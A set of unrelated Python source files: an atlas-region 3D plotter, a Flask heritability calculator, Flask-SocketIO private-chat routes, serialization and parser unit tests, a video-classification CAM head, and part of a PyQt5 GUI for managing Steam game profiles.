from collections import OrderedDict
class atlasregiongraph(object):
"""Class for generating the color coded atlas region graphs"""
def __init__(self, token, path=None):
self._token = token
self._path = path
data_txt = ""
if path == None:
data_txt = 'output/' + token + '/' + token + '.region.csv'
self._path = 'output/' + token
else:
data_txt = path + '/' + token + '.region.csv'
self._data = np.genfromtxt(data_txt, delimiter=',', dtype='int', usecols = (0,1,2,4), names=['x','y','z','region'])
def generate_atlas_region_graph(self, resolution, path=None, numRegions = 10):
font = {'weight' : 'bold',
'size' : 18}
matplotlib.rc('font', **font)
thedata = self._data
if path == None:
thedata = self._data
else:
### load data
thedata = np.genfromtxt(self._path + '/' + self._token + '.region.csv', delimiter=',', dtype='int', usecols = (0,1,2,4), names=['x','y','z','region'])
# Set tupleResolution to resolution input parameter
tupleResolution = resolution;
# EG: for Aut1367, the spacing is (0.01872, 0.01872, 0.005).
xResolution = tupleResolution[0]
yResolution = tupleResolution[1]
zResolution = tupleResolution[2]
# Now, to get the mm image size, we can multiply all x, y, z
# to get the proper mm size when plotting.
"""Load the CSV of the ARA with CCF v2 (see here for docs:)"""
ccf_txt = './../ccf/natureCCFOhedited.csv'
ccf = {}
with open(ccf_txt, 'rU') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
# row[0] is ccf atlas index, row[4] is string of full name
ccf[row[0]] = row[4];
# print row[0]
# print row[4]
# print ', '.join(row)
"""Save counts for each region into a separate CSV"""
unique = [];
for l in thedata:
unique.append(l[3])
uniqueNP = np.asarray(unique)
allUnique = np.unique(uniqueNP)
numRegionsA = len(allUnique)
# Store and count the number of regions in each unique region
dictNumElementsRegion = {}
for i in range(numRegionsA):
counter = 0;
for l in thedata:
if l[3] == allUnique[i]:
counter = counter + 1;
dictNumElementsRegion[ccf[str(l[3])]] = counter;
region_names = dictNumElementsRegion.keys()
number_repetitions = dictNumElementsRegion.values()
from itertools import izip
with open('ARA_CCF2_ds_10XCounts.csv', 'wb') as write:
writer = csv.writer(write)
writer.writerows(izip(region_names, number_repetitions))
region_dict = OrderedDict()
for l in thedata:
trace = ccf[str(l[3])]
# trace = 'trace' + str(l[3])
if trace not in region_dict:
region_dict[trace] = np.array([[l[0], l[1], l[2], l[3]]])
# print 'yay'
else:
tmp = np.array([[l[0], l[1], l[2], l[3]]])
region_dict[trace] = np.concatenate((region_dict.get(trace, np.zeros((1, 4))), tmp), axis=0)
# print 'nay'
current_palette = sns.color_palette("husl", numRegions)
# print current_palette
data = []
for i, key in enumerate(region_dict):
trace = region_dict[key]
tmp_col = current_palette[i]
tmp_col_lit = 'rgb' + str(tmp_col)
temp = str(np.unique(trace[:, 3])).replace("[", "")
final = temp.replace("]", "")
trace_scatter = Scatter3d(
x=[x * xResolution for x in trace[:, 0]],
y=[x * yResolution for x in trace[:, 1]],
z=[x * zResolution for x in trace[:, 2]],
mode='markers',
name=ccf[final],
marker=dict(
size=1.2,
color=tmp_col_lit, # 'purple', # set color to an array/list of desired values
colorscale='Viridis', # choose a colorscale
opacity=0.15
)
)
data.append(trace_scatter)
layout = Layout(
margin=dict(
l=0,
r=0,
b=0,
t=0
),
paper_bgcolor='rgb(0,0,0)',
plot_bgcolor='rgb(0,0,0)'
)
fig = Figure(data=data, layout=layout)
plotly.offline.plot(fig, filename= self._path + '/' + self._token + "_region_pointcloud.html")
|
<filename>base/views/tools/heritability.py
import io
import requests
import statistics as st
import numpy as np
import pandas as pd
from base.utils.data_utils import hash_it
from base.utils.gcloud import check_blob, upload_file
from base.config import config
from base.forms import heritability_form
from flask import (request,
jsonify,
render_template,
Blueprint,
abort)
from logzero import logger
from datetime import datetime
from threading import Thread
# ================== #
# heritability #
# ================== #
# Tools blueprint
heritability_bp = Blueprint('heritability',
__name__,
template_folder='tools')
@heritability_bp.route('/heritability')
def heritability():
VARS = {"title": "Heritability Calculator",
"form": heritability_form()}
return render_template('tools/heritability_calculator.html', **VARS)
def h2_task(data, data_hash):
"""
This is designed to be run in the background on the server.
It will run a heritability analysis on google cloud run
"""
# Perform h2 request
result = requests.post(config['HERITABILITY_URL'], data={'data': data,
'hash': data_hash})
logger.debug(result)
@heritability_bp.route('/heritability/submit', methods=["POST"])
def submit_h2():
"""
This endpoint is used to submit a heritability job.
The endpoint request is executed as a background task to keep the job alive.
"""
data = request.get_json()
data = [x for x in data[1:] if x[0] is not None]
header = ["AssayNumber", "Strain", "TraitName", "Replicate", "Value"]
data = pd.DataFrame(data, columns=header)
data = data.to_csv(index=False, sep="\t")
# Generate an ID for the data based on its hash
data_hash = hash_it(data, length=32)
logger.debug(data_hash)
# Upload data immediately.
data_blob = f"reports/heritability/{data_hash}/data.tsv"
upload_file(data_blob, data, as_string=True)
thread = Thread(target=h2_task, args=(data, data_hash,))
thread.daemon = True
thread.start()
return jsonify({'thread_name': str(thread.name),
'started': True,
'data_hash': data_hash})
@heritability_bp.route('/heritability', methods=["POST"])
def check_data():
"""
This check is used to report on the:
Minimum
Maximum
Quartiles: 25, 50, 75
Variance
using an AJAX request - it appears at the bottom
before the user submits.
"""
data = request.get_json()
data = [x for x in data[1:] if x[0] is not None]
header = ["AssayNumber", "Strain", "TraitName", "Replicate", "Value"]
data = pd.DataFrame(data, columns=header)
# filter missing
data = data[data.Value.apply(lambda x: x not in [None, "", "NA"])]
# Convert to list
data = data.Value.astype(float).tolist()
result = {}
result["variance"] = "{:.2f}".format(st.variance(data))
result["sd"] = "{:.2f}".format(st.stdev(data))
result["minimum"] = "{:.2f}".format(min(data))
result["maximum"] = "{:.2f}".format(max(data))
# Calculate quartiles
All_quartiles = np.percentile(data, [25, 50, 75])
result["25"] = "{:.2f}".format(All_quartiles[0])
result["50"] = "{:.2f}".format(All_quartiles[1])
result["75"] = "{:.2f}".format(All_quartiles[2])
return result
@heritability_bp.route("/heritability/h2/<data_hash>")
def heritability_result(data_hash):
title = "Heritability Results"
data = check_blob(f"reports/heritability/{data_hash}/data.tsv")
result = check_blob(f"reports/heritability/{data_hash}/result.tsv")
ready = False
if data is None:
return abort(404, description="Heritability report not found")
data = data.download_as_string().decode('utf-8')
data = pd.read_csv(io.StringIO(data), sep="\t")
data['AssayNumber'] = data['AssayNumber'].astype(str)
data['label'] = data.apply(lambda x: f"{x['AssayNumber']}: {x['Value']}", 1)
data = data.to_dict('records')
trait = data[0]['TraitName']
# Get trait and set title
title = f"Heritability Results: {trait}"
if result:
result = result.download_as_string().decode('utf-8')
result = pd.read_csv(io.StringIO(result), sep="\t")
result = result.to_dict('records')[0]
fnam=datetime.today().strftime('%Y%m%d.')+trait
ready = True
return render_template("tools/heritability_results.html", **locals())
|
# app/chats/routes.py
from app import db, socketio
from app.chats import chats
from app.chats.models import Chat
from app.auth.models import User
from app.likes.models import Like
from app.blocks.models import Block
from app.notifications.models import Notification
from flask import render_template, redirect, url_for, session, flash, request, jsonify
from flask_socketio import SocketIO, send, emit
from sqlalchemy.orm import aliased
from datetime import datetime
from werkzeug.wrappers import Response
users = {}
@socketio.on('register_user')
def register_user():
users[session['user_id']] = request.sid
@socketio.on('private_message', namespace='/private')
def private_message(payload):
message = payload['message']
# verify recipient can receive message from sender by checking blocks and likes
parent = aliased(Like, name="parent")
child = aliased(Like, name="child")
can_message = db.session.query(User.id) \
.outerjoin(Block, \
((session['user_id'] == Block.blocked_id) & \
(payload['user_id'] == Block.blocked_by_id)) | \
((session['user_id'] == Block.blocked_by_id) & \
(payload['user_id'] == Block.blocked_id))) \
.filter(Block.blocked_id == None, User.id == payload['user_id']) \
.join(parent, ((session['user_id'] == parent.liked_id) & (payload['user_id'] == parent.liked_by_id))) \
.filter(session['user_id'] == parent.liked_id) \
.join(child, \
(child.liked_id == parent.liked_by_id) & \
(child.liked_by_id == parent.liked_id)) \
.first()
if can_message and can_message[0] == int(payload['user_id']):
Chat.save_message(sent_by_id=session['user_id'],
received_by_id=payload['user_id'],
message=message,
message_time=payload['timestamp'])
notification = Notification.query.filter_by(owner_id = payload['user_id'], sent_by_id = payload['sender'], event_id = 5).first()
if not notification:
Notification.create_notification(payload['user_id'], payload['sender'], 5, datetime.now())
else:
notification.update_notification()
if users.get(payload['user_id']):
recipient_session_id = users[payload['user_id']]
emit('new_private_message', payload, room=recipient_session_id)
@chats.route('/chats', methods=['GET'])
def display_chats():
referral_id = request.args.get('referral_id', None)
parent = aliased(Like, name="parent")
child = aliased(Like, name="child")
chat_users = db.session.query(User, Block, parent, child) \
.join(parent, ((parent.liked_id == User.id) & (parent.liked_by_id == session['user_id']))) \
.filter(parent.liked_by_id == session['user_id']) \
.outerjoin(Block, ((Block.blocked_id == User.id) & (Block.blocked_by_id == session['user_id'])) | \
((Block.blocked_by_id == User.id) & (Block.blocked_id == session['user_id']))) \
.filter(Block.blocked_id == None) \
.join(child, \
(child.liked_id == parent.liked_by_id) & \
(parent.liked_id == child.liked_by_id)) \
.limit(20) \
.all()
return render_template('chats.html', chat_users=chat_users, referral_id=referral_id, chat_notif=True)
@chats.route('/history', methods=['POST'])
def get_chat_history():
try:
recipient_id = request.json['recipient_id']
if type(recipient_id) != int and recipient_id.isdigit() is False:
return "error"
parent = aliased(Like, name="parent")
child = aliased(Like, name="child")
# Validate the recipient_id isn't blocked or blocking current_user and that both users liked each other
messages = db.session.query(Chat.sent_by_id, Chat.message, Chat.message_time) \
.join(parent, ((session['user_id'] == parent.liked_id) & (recipient_id == parent.liked_by_id))) \
.filter(session['user_id'] == parent.liked_id) \
.join(child, \
(child.liked_id == parent.liked_by_id) & \
(child.liked_by_id == parent.liked_id)) \
.outerjoin(Block, \
((session['user_id'] == Block.blocked_id) & \
(recipient_id == Block.blocked_by_id)) | \
((session['user_id'] == Block.blocked_by_id) & \
(recipient_id == Block.blocked_id))) \
.filter(Block.blocked_id == None, ((Chat.sent_by_id==recipient_id) & (Chat.received_by_id==session['user_id'])) |\
((Chat.received_by_id==recipient_id) & (Chat.sent_by_id==session['user_id']))) \
.order_by(Chat.id.desc()) \
.limit(100) \
.all()
# need to reverse messages on front end
return jsonify(messages=messages)
except:
return "error"
@chats.errorhandler(429)
def ratelimit_handler(error):
return render_template('429.html'), 429 |
<gh_stars>1-10
import io
import unittest
from pprint import pprint as pp
from zoa import *
def assert_roundtrip(v):
zoa = ZoaRaw.from_bytes(v)
b = zoa.serialize()
result_zoa = from_zoab(b)
pp(result_zoa.arr)
print()
result = result_zoa.to_py()
pp(v)
pp(result)
print(f'len: {len(v)} == {len(result)}')
assert v == result
class TestZoaRaw(unittest.TestCase):
def test_write_str(self):
b = io.BytesIO()
write_data(b, b'hi')
b = b.getvalue()
assert b[0] == 2
assert b[1:] == b'hi'
def test_write_arr_str(self):
bw = io.BytesIO()
v = [ZoaRaw.new_data(b'hi')]
assert v[0].data == b'hi'
write_arr(bw, v)
b = bw.getvalue()
print(b)
assert b[0] == ZOA_ARR | 1
assert b[1] == 2 # the string
assert b[2:] == b'hi'
def test_from_arr_str(self):
v = from_zoab(io.BytesIO(b'\x02hi'))
assert v == ZoaRaw.new_data(b'hi')
def test_from_to(self):
assert_roundtrip([])
assert_roundtrip([b'hi', b'bob'])
assert_roundtrip([ [] ])
assert_roundtrip([b'hi', [] ])
assert_roundtrip([b'hi', [b'bob']])
def test_long_bytes(self):
bw = io.BytesIO()
b = b'0123456789' * 13 # length = 130 (63 + 63 + 4
write_data(bw, b)
r = bw.getvalue()
print(f"\n{hex(r[0])} == {hex(ZOA_DATA | ZOA_JOIN | 63)}\n")
assert r[0] == ZOA_DATA | ZOA_JOIN | 63
assert r[1:64] == b[0:63]
assert r[64] == ZOA_DATA | ZOA_JOIN | 63
assert r[65:128] == b[63:126]
assert r[128] == ZOA_DATA | 4
assert r[129:] == b[126:]
def test_long_round(self):
a = [ b'one', b'two', b'three', b'four', b'five' ] * 30 # 150
assert_roundtrip(a)
class TestBase(unittest.TestCase):
def setUp(self):
self.env = TyEnv()
class TestZoaTy(TestBase):
def test_int(self):
assert b'\x42' == Int(0x42).toZ().data
assert 0x42 == Int.frZ(ZoaRaw.new_data(b'\x42'))
z = Int(-0x42).toZ()
assert len(z.arr) == 1
assert b'\x42' == z.arr[0].data
assert -0x42 == Int.frZ(ZoaRaw.new_arr([ZoaRaw.new_data(b'\x42')]))
def test_arr_int(self):
ArrInt = self.env.arr(Int)
ai = ArrInt.frPy(range(10))
z = ai.toZ()
assert b'\x00' == z.arr[0].data
assert b'\x09' == z.arr[9].data
assert ai == ArrInt.frZ(z)
def test_bytes(self):
b = Bytes(b'abc 123')
assert b'abc 123' == b.toZ().data
assert b == Bytes.frZ(ZoaRaw.new_data(b'abc 123'))
def test_struct(self):
ty = self.env.struct(None, b'foo', [
(b'a', StructField(Int)),
])
z = ZoaRaw.new_arr([
Int(1).toZ(), # numPositional
Int(0x77).toZ(), # value of 'a'
])
s = ty.frZ(z)
assert s.a == 0x77
assert z == s.toZ()
def test_enum(self):
ty = self.env.enum(None, b'en', [
(b'a', Int),
(b'b', Bytes),
])
en = ty(a=Int(3))
assert en.b is None; assert 3 == en.a
assert en.toZ() == ZoaRaw.new_arr([Int(0).toZ(), Int(3).toZ()])
en = ty(b=Bytes(b'hi there enum'))
assert en.a is None; assert en.b == b'hi there enum'
assert en.toZ() == ZoaRaw.new_arr([
Int(1).toZ(), Bytes(b'hi there enum').toZ()])
assert ty.frZ(en.toZ()) == en
def test_bitmap(self):
ty = self.env.bitmap(None, b'bm', [
(b'a', BmVar(0x01, 0x03)),
(b'b', BmVar(0x03, 0x03)),
(b'noTop', BmVar(0x00, 0x10)),
(b'top', BmVar(0x10, 0x10)),
])
bm = ty(); assert 0 == bm.value
bm.set_top(); assert 0x10 == bm.value
bm.set_noTop(); assert 0x00 == bm.value
bm.set_a(); assert 0x01 == bm.value
assert 0x01 == bm.get_a()
bm.set_b(); assert 0x03 == bm.value
assert 0x03 == bm.get_a()
bm.set_a(); assert 0x01 == bm.value
bm.set_top(); assert 0x11 == bm.value
assert bm.is_a()
assert not bm.is_b()
assert bm.is_top()
bm.set_a(0x03); assert bm.is_b(); assert 0x13 == bm.value
assert bm.toZ() == ZoaRaw.new_data(b'\x13')
assert bm.frZ(bm.toZ()) == bm
def tokens(buf):
out, p = [], Parser(buf)
while p.i < len(buf):
t = p.token()
if not t: break
out.append(t.decode('utf-8'))
return out
class TestParse(TestBase):
def test_TG(self):
assert TG.fromChr(ord(' ')) is TG.T_WHITE
assert TG.fromChr(ord('\n')) is TG.T_WHITE
assert TG.fromChr(ord('_')) is TG.T_NUM
assert TG.fromChr(ord('f')) is TG.T_HEX
assert TG.fromChr(ord('g')) is TG.T_ALPHA
assert TG.fromChr(ord('.')) is TG.T_ALPHA
def test_skipWhitespace(self):
p = Parser(b' \nfoo')
assert p.i == 0
p.skipWhitespace(); assert p.i == 4
p.skipWhitespace(); assert p.i == 4
def test_comment(self):
Parser(b'\\ hi there\n \\hi \\there\n \\(hi there) \\bob').parse()
def test_single(self):
assert b']' == Parser(b']').token()
assert b')' == Parser(b')').token()
assert b'a' == Parser(b'a').token()
def test_tokens(self):
assert tokens(b'a_b[foo.bar baz]') == [
'a_b', '[', 'foo.bar', 'baz', ']']
def test_struct(self):
p = Parser(b'struct foo [a: Int]')
p.parse()
foo = p.env.tys[b'foo']
assert foo._fields == [(b'a', StructField(Int))]
p = Parser(b'struct Ab [a: Int; b: Bytes]')
p.parse()
Ab = p.env.tys[b'Ab']
assert Ab._fields == [
(b'a', StructField(Int)),
(b'b', StructField(Bytes)),
]
ab = Ab(a = 1, b = b'hi')
assert ab.a == 1
assert ab.b == b'hi'
def test_struct_inner(self):
p = Parser(b'struct Foo [a: Int]\nstruct Bar[a: Int; f: Foo]')
p.parse()
Foo = p.env.tys[b'Foo']
Bar = p.env.tys[b'Bar']
assert Bar._fields == [
(b'a', StructField(Int)),
(b'f', StructField(Foo)),
]
def test_enum(self):
p = Parser(b'enum E \\comment [a: Int; b: Bytes]')
p.parse()
E = p.env.tys[b'E']
assert E._variants == [
(b'a', Int),
(b'b', Bytes),
]
def test_bitmap(self):
p = Parser(b'bitmap B [a 0x01 0x03; b 0x02 0x07]')
p.parse()
B = p.env.tys[b'B']
assert B._variants == [
(b'a', BmVar(1, 3)),
(b'b', BmVar(2, 7)),
]
if __name__ == '__main__':
unittest.main()
|
<filename>mmaction/models/heads/cam_head.py<gh_stars>0
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import normal_init, kaiming_init
from ..builder import HEADS
from .base import BaseHead
from ...core import top_k_accuracy
import math
def obj_loc(score, threshold):
smax, sdis, sdim = 0, 0, score.size(0)
minsize = int(math.ceil(sdim * 0.125)) #0.125
# minsize = 1
snorm = (score - threshold).sign()
snormdiff = (snorm[1:] - snorm[:-1]).abs()
szero = (snormdiff==2).nonzero()
if len(szero)==0:
zmin, zmax = int(math.ceil(sdim*0.125)), int(math.ceil(sdim*0.875))
return zmin, zmax
if szero[0] > 0:
lzmin, lzmax = 0, szero[0].item()
lzdis = lzmax - lzmin
lsmax, _ = score[lzmin:lzmax].max(0)
if lsmax > smax:
smax, zmin, zmax, sdis = lsmax, lzmin, lzmax, lzdis
if lsmax == smax:
if lzdis > sdis:
smax, zmin, zmax, sdis = lsmax, lzmin, lzmax, lzdis
if szero[-1] < sdim:
lzmin, lzmax = szero[-1].item(), sdim
lzdis = lzmax - lzmin
lsmax, _ = score[lzmin:lzmax].max(0)
if lsmax > smax:
smax, zmin, zmax, sdis = lsmax, lzmin, lzmax, lzdis
if lsmax == smax:
if lzdis > sdis:
smax, zmin, zmax, sdis = lsmax, lzmin, lzmax, lzdis
if len(szero) >= 2:
for i in range(len(szero)-1):
lzmin, lzmax = szero[i].item(), szero[i+1].item()
lzdis = lzmax - lzmin
lsmax, _ = score[lzmin:lzmax].max(0)
if lsmax > smax:
smax, zmin, zmax, sdis = lsmax, lzmin, lzmax, lzdis
if lsmax == smax:
if lzdis > sdis:
smax, zmin, zmax, sdis = lsmax, lzmin, lzmax, lzdis
if zmax - zmin <= minsize:
pad = minsize-(zmax-zmin)
if zmin > int(math.ceil(pad/2.0)) and sdim - zmax > pad:
zmin = zmin - int(math.ceil(pad/2.0)) + 1
zmax = zmax + int(math.ceil(pad/2.0))
if zmin < int(math.ceil(pad/2.0)):
zmin = 0
zmax = minsize
if sdim - zmax < int(math.ceil(pad/2.0)):
zmin = sdim - minsize + 1
zmax = sdim
if zmax - zmin < 1:
if sdim-zmax>=1:
zmax = zmax+1
else:
zmin = zmin-1
return zmin, zmax
@HEADS.register_module()
class CAMHead(BaseHead):
"""Classification head for I3D.
Args:
num_classes (int): Number of classes to be classified.
in_channels (int): Number of channels in input feature.
loss_cls (dict): Config for building loss.
Default: dict(type='CrossEntropyLoss')
spatial_type (str): Pooling type in spatial dimension. Default: 'avg'.
dropout_ratio (float): Probability of dropout layer. Default: 0.5.
init_std (float): Std value for Initiation. Default: 0.01.
kwargs (dict, optional): Any keyword argument to be used to initialize
the head.
"""
def __init__(self,
num_classes,
in_channels,
loss_cls=dict(type='CrossEntropyLoss'),
spatial_type='avg',
dropout_ratio=0.5,
topN=6,
vis=False,
threshold=0.5,
# init_std=0.01,
**kwargs):
super().__init__(num_classes, in_channels, loss_cls, **kwargs)
self.spatial_type = spatial_type
self.dropout_ratio = dropout_ratio
self.topN = topN
self.vis = vis
self.threshold = threshold
if self.dropout_ratio != 0:
self.dropout = nn.Dropout(p=self.dropout_ratio)
else:
self.dropout = None
self.fc_cls = nn.Conv3d(self.in_channels, self.num_classes, 1, bias = True)
self.fc_local = nn.Sequential(
nn.Conv3d(self.in_channels, 4 * self.in_channels, 1, bias = True),
nn.ReLU(),
nn.Dropout(0.1),
nn.Conv3d(4 * self.in_channels, self.num_classes, 1, bias = True),
)
if self.spatial_type == 'avg':
# use `nn.AdaptiveAvgPool3d` to adaptively match the in_channels.
self.avg_pool = nn.AdaptiveAvgPool3d((1, 1, 1))
else:
self.avg_pool = None
def init_weights(self):
"""Initiate the parameters from scratch."""
kaiming_init(self.fc_cls)
def forward(self, x):
"""Defines the computation performed at every call.
Args:
x (torch.Tensor): The input data.
Returns:
torch.Tensor: The classification scores for input samples.
"""
b, d, t, h, w = x.shape
# [N, in_channels, 4, 7, 7]
gf = self.avg_pool(x)
# [N, in_channels, 1, 1, 1]
if self.dropout is not None:
gf = self.dropout(gf)
# [N, in_channels, 1, 1, 1]
gs = self.fc_cls(gf)
# [N, num_classes, 1, 1, 1]
gs = torch.sigmoid(gs)
gs = gs.view(x.shape[0], -1)
# [N, num_classes]
camscore = self.fc_cls(x.detach())
camscore = torch.sigmoid(camscore)
wscore = F.adaptive_max_pool3d(camscore, (1, 1, None)).squeeze(dim=2).squeeze(dim=2)
hscore = F.adaptive_max_pool3d(camscore, (1, None, 1)).squeeze(dim=4).squeeze(dim=2)
tscore = F.adaptive_max_pool3d(camscore, (None, 1, 1)).squeeze(dim=3).squeeze(dim=3)
# print(wscore.shape, hscore.shape, tscore.shape)
proposals = torch.zeros([b, self.topN, d, t, h, w]).cuda()
if self.vis == True:
region_bboxs = torch.FloatTensor(b, self.topN, 8)
for i in range(b):
gs_inv, gs_ind = gs[i].sort(descending=True)
for j in range(self.topN):
xs = wscore[i,gs_ind[j],:].squeeze()
ys = hscore[i,gs_ind[j],:].squeeze()
ts = tscore[i,gs_ind[j],:].squeeze()
if xs.max() == xs.min():
xs = xs/xs.max()
else:
xs = (xs-xs.min())/(xs.max()-xs.min())
if ys.max() == ys.min():
ys = ys/ys.max()
else:
ys = (ys-ys.min())/(ys.max()-ys.min())
if ts.max() == ts.min():
ts = ts/ts.max()
else:
ts = (ts-ts.min())/(ts.max()-ts.min())
x1, x2 = obj_loc(xs, self.threshold)
y1, y2 = obj_loc(ys, self.threshold)
t1, t2 = obj_loc(ts, self.threshold)
# print(x.shape, x1, x2, y1, y2, t1, t2)
proposals[i:i+1, j ] = F.interpolate(x[i:i+1, :, t1:t2, y1:y2, x1:x2], size=(t, h, w), mode='trilinear', align_corners=True)
if self.vis == True:
region_bboxs[i,j] = torch.Tensor([t1, t2, x1, x2, y1, y2, gs_ind[j].item(), gs[i, gs_ind[j]].item()])
proposals = proposals.view(b*self.topN, d, t, h, w)
lf = F.adaptive_max_pool3d(proposals, (1,1,1))
lf = self.fc_local(lf)
ls = torch.sigmoid(lf)
ls = F.adaptive_max_pool2d(ls.reshape(b, self.topN, self.num_classes, 1).permute(0, 3, 1, 2), (1, self.num_classes))
ls = ls.view(ls.size(0), -1)
if self.vis == True:
return gs, ls, region_bboxs
else:
# print(gs.shape, ls.shape)
return gs, ls
# return cls_score
def loss(self, cls_score, labels, **kwargs):
"""Calculate the loss given output ``cls_score``, target ``labels``.
Args:
cls_score (torch.Tensor): The output of the model.
labels (torch.Tensor): The target output of the model.
Returns:
dict: A dict containing field 'loss_cls'(mandatory)
and 'top1_acc', 'top5_acc'(optional).
"""
losses = dict()
loss = dict()
if isinstance(cls_score, tuple):
gs, ls = cls_score
if labels.shape == torch.Size([]):
labels = labels.unsqueeze(0)
elif labels.dim() == 1 and labels.size()[0] == self.num_classes:
# Fix a bug when training with soft labels and batch size is 1.
# When using soft labels, `labels` and `cls_socre` share the same
# shape.
if (isinstance(cls_score, tuple) and cls_score[0].size()[0] == 1) or cls_score.size()[0] == 1 :
labels = labels.unsqueeze(0)
elif self.multi_class and self.label_smooth_eps != 0:
labels = ((1 - self.label_smooth_eps) * labels + self.label_smooth_eps / self.num_classes)
if self.multi_class and cls_score is not None:
# Only use the cls_score
if isinstance(cls_score, tuple):
loss['g_loss'] = self.loss_cls(gs, labels, **kwargs)
loss['l_loss'] = self.loss_cls(ls, labels, **kwargs)
cls_score = (gs + ls) / 2.
else:
loss['loss_cls'] = self.loss_cls(cls_score, labels, **kwargs)
recall_thr, prec_thr, recall_k, prec_k = self.multi_label_accuracy(
cls_score, labels, thr=0.5)
losses['recall@thr=0.5'] = recall_thr
losses['prec@thr=0.5'] = prec_thr
for i, k in enumerate(self.topk):
losses[f'recall@top{k}'] = recall_k[i]
losses[f'prec@top{k}'] = prec_k[i]
# loss_cls may be dictionary or single tensor
if isinstance(loss, dict):
losses.update(loss)
else:
losses['loss_cls'] = loss
return losses
|
<gh_stars>0
from Qt.gui import Ui_MainWindow
from PyQt5.QtWidgets import QMainWindow, QHeaderView, QTableWidgetItem, QShortcut, QListWidget, QTableView
from PyQt5.QtCore import QAbstractItemModel, Qt, QModelIndex, QVariant, QThread, QEvent, pyqtSignal, QAbstractTableModel, QSortFilterProxyModel
from PyQt5.QtGui import QKeySequence, QIcon
from shutil import copyfile
import core
import subprocess
import psutil
import fileinput
profile_manager = core.ProfileManager()
games = []
class MainWindow(QMainWindow):
def __init__(self):
super(MainWindow,self).__init__()
self.main_window = Ui_MainWindow()
self.main_window.setupUi(self)
self.setup()
self.connect_components()
self.search_thread = SearchThread("")
def setup(self):
self.setWindowIcon(QIcon("icon.ico"))
# Hidde Other Windows
self.main_window.profile_create_window.setHidden(True)
self.main_window.searching_frame.setHidden(True)
self.main_window.set_steam_path_window.setHidden(True)
self.main_window.closing_steam.setHidden(True)
self.main_window.generic_popup.setHidden(True)
self.main_window.settings_window.setHidden(True)
#-------
self.main_window.version_label.setText("v{0}".format(core.CURRENT_VERSION))
self.main_window.no_hook_checkbox.setChecked(core.config.no_hook)
self.main_window.compatibility_mode_checkbox.setChecked(core.config.compatibility_mode)
self.populate_list(self.main_window.games_list, games)
self.main_window.games_list.dropEvent = self.drop_event_handler
self.populate_table(self.main_window.search_result)
self.show_profile_names()
self.show_profile_games(profile_manager.profiles[self.main_window.profile_selector.currentText()])
self.setup_steam_path()
self.setup_search_table()
# self.main_window.main_panel.raise_()
# Settings Window Setup
self.main_window.update_checkbox.setChecked(core.config.check_update)
# Shortcuts
del_game = QShortcut(QKeySequence(Qt.Key_Delete), self.main_window.games_list)
del_game.activated.connect(self.remove_selected)
def connect_components(self):
# Profile
self.main_window.create_profile.clicked.connect(lambda : self.toggle_widget(self.main_window.profile_create_window))
self.main_window.create_profile_btn.clicked.connect(self.create_profile)
self.main_window.cancel_profile_btn.clicked.connect(lambda : self.toggle_widget(self.main_window.profile_create_window))
self.main_window.profile_selector.currentTextChanged.connect(self.select_profile)
self.main_window.remove_game.clicked.connect(self.remove_selected)
self.main_window.delete_profile.clicked.connect(self.delete_profile)
# Steam Path
self.main_window.save_steam_path.clicked.connect(self.set_steam_path)
self.main_window.cancel_steam_path_btn.clicked.connect(lambda : self.toggle_widget(self.main_window.set_steam_path_window))
# Search Area
self.main_window.search_btn.clicked.connect(self.search_games)
self.main_window.game_search_text.returnPressed.connect(self.search_games)
self.main_window.add_to_profile.clicked.connect(self.add_selected)
# Main Buttons
self.main_window.generate_btn.clicked.connect(self.generate_app_list)
self.main_window.run_GLR_btn.clicked.connect(lambda : self.show_popup("This will restart Steam if it's open do you want to continue?", self.run_GLR))
# Settings Window
self.main_window.settings_btn.clicked.connect(lambda : self.toggle_widget(self.main_window.settings_window))
self.main_window.settings_save_btn.clicked.connect(self.save_settings)
self.main_window.settings_cancel_btn.clicked.connect(lambda : self.toggle_widget(self.main_window.settings_window))
# Popup Window
self.main_window.popup_btn2.clicked.connect(lambda : self.toggle_widget(self.main_window.generic_popup, True))
# Profile Functions
def create_profile(self):
name = self.main_window.profile_name.text()
if name != "":
profile_manager.create_profile(name)
self.main_window.profile_selector.addItem(name)
self.main_window.profile_name.clear()
self.main_window.profile_selector.setCurrentIndex(self.main_window.profile_selector.count() - 1)
self.toggle_widget(self.main_window.profile_create_window)
def delete_profile(self):
name = self.main_window.profile_selector.currentText()
if name == "default":
return
profile_manager.remove_profile(name)
index = self.main_window.profile_selector.currentIndex()
self.main_window.profile_selector.removeItem(index)
def select_profile(self, name):
with core.get_config() as config:
config.last_profile = name
self.show_profile_games(profile_manager.profiles[name])
def show_profile_games(self, profile):
list_ = self.main_window.games_list
self.populate_list(list_, profile.games)
def show_profile_names(self):
data = profile_manager.profiles.values()
if core.config.last_profile in profile_manager.profiles.keys():
self.main_window.profile_selector.addItem(core.config.last_profile)
for item in data:
if item.name != core.config.last_profile:
self.main_window.profile_selector.addItem(item.name)
# Search Functions
def search_games(self):
query = self.main_window.game_search_text.text()
if query == "":
return
self.toggle_hidden(self.main_window.searching_frame)
self.search_thread = SearchThread(query)
self.search_thread.signal.connect(self.search_games_done)
self.search_thread.start()
def search_games_done(self, result):
if type(result) is list:
self.toggle_hidden(self.main_window.searching_frame)
self.populate_table(self.main_window.search_result,result)
else:
self.toggle_hidden(self.main_window.searching_frame)
self.show_popup("Can't connect to Steamdb. Check if you have internet connection.", lambda : self.toggle_widget(self.main_window.generic_popup, True))
def setup_search_table(self):
h_header = self.main_window.search_result.horizontalHeader()
h_header.setSectionResizeMode(1,QHeaderView.Stretch)
h_header.setSectionResizeMode(0,QHeaderView.ResizeToContents)
h_header.setMaximumSectionSize(620)
def populate_table(self, table: QTableView, data=[]):
model = TableModel(data)
sortable_model = QSortFilterProxyModel(model)
sortable_model.setSourceModel(model)
table.setModel(sortable_model)
def populate_list(self, list_, data):
list_.clear()
for item in data:
list_.addItem(item.name)
# Search Table and Profile Interaction Functions
def add_selected(self):
items = [selected.data() for selected in self.main_window.search_result.selectedIndexes()]
if len(items) == 0:
return
profile = profile_manager.profiles[self.main_window.profile_selector.currentText()]
for game in core.Game.from_table_list(items):
if game not in profile.games:
profile.add_game(game)
self.show_profile_games(profile)
profile.export_profile()
def remove_selected(self):
items = self.main_window.games_list.selectedItems()
if len(items) == 0:
return
profile = profile_manager.profiles[self.main_window.profile_selector.currentText()]
for item in items:
profile.remove_game(item.text())
self.show_profile_games(profile)
profile.export_profile()
# Settings Functions
def save_settings(self):
with core.get_config() as config:
config.steam_path = self.main_window.settings_steam_path.text()
